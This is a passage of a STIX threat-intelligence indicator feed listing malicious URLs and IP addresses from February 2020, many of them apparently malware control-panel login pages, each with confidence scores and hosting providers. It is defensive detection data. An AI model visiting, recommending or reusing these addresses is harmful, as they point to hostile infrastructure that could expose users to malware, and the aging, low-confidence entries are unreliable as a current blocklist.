http://groupbizconsulting.com/p4/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:03.426Z"} +{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 138.201.56.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '138.201.56.185']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} +{"created":"2020-02-05T01:59:06.271Z","description":"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-05T01:59:06.271Z","name":"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:59:06.271Z"} +{"created":"2020-02-05T01:59:24.611Z","description":"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-05T01:59:24.611Z","name":"mal_url: http://ipblasta.com/kmaker/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ipblasta.com/kmaker/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:24.611Z"} +{"created":"2020-02-05T01:59:31.341Z","description":"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-05T01:59:31.341Z","name":"mal_url: http://softtouchcollars.com/origin/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/origin/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:31.341Z"} +{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 162.241.216.92","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.216.92']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} +{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.208.84.96","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.208.84.96']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} +{"created":"2020-02-05T02:00:16.19Z","description":"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-05T02:00:16.19Z","name":"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:16.19Z"} +{"created":"2020-02-05T02:00:23.009Z","description":"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-05T02:00:23.009Z","name":"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:23.009Z"} +{"created":"2020-02-05T02:00:29.679Z","description":"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:00:29.679Z","name":"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:29.679Z"} +{"created":"2020-02-05T02:00:52.297Z","description":"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-05T02:00:52.297Z","name":"mal_url: http://futuracosmetic.com/frank/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://futuracosmetic.com/frank/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:52.297Z"} +{"created":"2020-02-05T02:00:57.141Z","description":"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--320c2f41-7546-4aa7-afef-5188df844448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:00:57.141Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.141Z"} +{"created":"2020-02-05T02:00:57.172Z","description":"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-05T02:00:57.172Z","name":"mal_url: http://video-ld.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://video-ld.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.172Z"} +{"created":"2020-02-05T02:00:57.733Z","description":"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-05T02:00:57.733Z","name":"mal_url: http://nortonlilly.info/emma/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/emma/login.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.733Z"} +{"created":"2020-02-05T02:01:03.604Z","description":"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--e396f12a-867b-4e91-8796-d042aef55ce3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:01:03.604Z","name":"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:03.604Z"} +{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 170.106.50.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '170.106.50.37']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} +{"created":"2020-02-05T02:01:18.261Z","description":"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--8dff68c1-1114-4092-9f29-f655f27d2337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.261Z","name":"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.261Z"} +{"created":"2020-02-05T02:01:18.285Z","description":"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--19636e7d-febc-4ae1-879a-28af129c19b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.285Z","name":"mal_url: http://credoaz.com/journals/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://credoaz.com/journals/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.285Z"} +{"created":"2020-02-05T02:01:21.73Z","description":"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--593225c7-68c8-44db-82bf-2c550931a60c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-05T02:01:21.73Z","name":"mal_url: http://bestlogs.myjino.ru/best/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']","type":"indicator","valid_from":"2020-02-05T02:01:21.73Z"} +{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://46.229.215.123/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.229.215.123/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} +{"created":"2020-02-06T02:10:15.947Z","description":"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--9586420f-3737-47b6-8d58-526f629d66e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:10:15.947Z","name":"mal_url: http://justwer.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://justwer.site/login']","type":"indicator","valid_from":"2020-02-06T02:10:15.947Z"} +{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 173.247.252.61","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '173.247.252.61']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} +{"created":"2020-02-06T02:10:22.051Z","description":"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--12dac6fb-e53b-4742-9cc4-da362e880571","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:10:22.051Z","name":"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:10:22.051Z"} +{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 91.215.169.220","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.220']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} +{"created":"2020-02-06T02:10:35.597Z","description":"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--524c1a55-264d-4f41-a854-1f0601921675","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-06T02:10:35.597Z","name":"mal_url: http://f0378370.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:10:35.597Z"} +{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: http://85.204.116.145/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.145/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} +{"created":"2020-02-06T02:11:08.205Z","description":"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6b38040c-6578-43c4-8cec-a426d1079a96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-06T02:11:08.205Z","name":"mal_url: http://f0396918.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396918.xsph.ru/login']","type":"indicator","valid_from":"2020-02-06T02:11:08.205Z"} +{"created":"2020-02-06T02:11:15.653Z","description":"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-06T02:11:15.653Z","name":"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:11:15.653Z"} +{"created":"2020-02-06T02:11:17.072Z","description":"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.072Z","name":"mal_url: http://l5056942.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l5056942.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:17.072Z"} +{"created":"2020-02-06T02:11:17.098Z","description":"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime","id":"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.098Z","name":"mal_url: http://h146438.s21.test-hf.su/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://h146438.s21.test-hf.su/index.php']","type":"indicator","valid_from":"2020-02-06T02:11:17.098Z"} +{"created":"2020-02-06T02:11:27.123Z","description":"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime","id":"indicator--29909afa-ad21-493c-b420-870dbc8dd0da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:11:27.123Z","name":"mal_url: http://tranpip.com/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tranpip.com/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:11:27.123Z"} +{"created":"2020-02-06T02:11:37.189Z","description":"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:11:37.189Z","name":"mal_url: http://l1430a3c.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:37.189Z"} +{"created":"2020-02-06T02:12:51.488Z","description":"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:12:51.488Z","name":"mal_url: http://f0391270.xsph.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-06T02:12:51.488Z"} +{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://85.204.116.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.144/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} +{"created":"2020-02-06T02:13:24.038Z","description":"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:13:24.038Z","name":"mal_url: http://xmpzi.icu/blue/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xmpzi.icu/blue/index.php']","type":"indicator","valid_from":"2020-02-06T02:13:24.038Z"} +{"created":"2020-02-06T02:13:26.405Z","description":"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-35"],"modified":"2020-02-06T02:13:26.405Z","name":"mal_url: http://155.94.210.79/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.94.210.79/login']","type":"indicator","valid_from":"2020-02-06T02:13:26.405Z"} +{"created":"2020-02-06T02:14:04.592Z","description":"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:14:04.592Z","name":"mal_url: http://lf9a7e2b.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:04.592Z"} +{"created":"2020-02-06T02:14:13.434Z","description":"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://5.188.60.16/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.16/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} +{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 137.74.20.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '137.74.20.60']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} +{"created":"2020-02-06T02:14:13.506Z","description":"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:14:13.506Z","name":"mal_url: http://tikkies.eu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tikkies.eu/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.506Z"} +{"created":"2020-02-06T02:14:14.285Z","description":"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:14:14.285Z","name":"mal_url: http://lb1a9935.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:14.285Z"} +{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://69.61.38.147/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://69.61.38.147/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} +{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} +{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} +{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://194.32.79.80/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://194.32.79.80/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} +{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} +{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} +{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 91.215.169.50","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.50']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} +{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 47.254.179.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.254.179.14']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} +{"created":"2020-02-08T14:02:17.271Z","description":"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-08T14:02:17.271Z","name":"mal_url: http://smineolo39wings.in/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smineolo39wings.in/login']","type":"indicator","valid_from":"2020-02-08T14:02:17.271Z"} +{"created":"2020-02-08T14:02:23Z","description":"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: 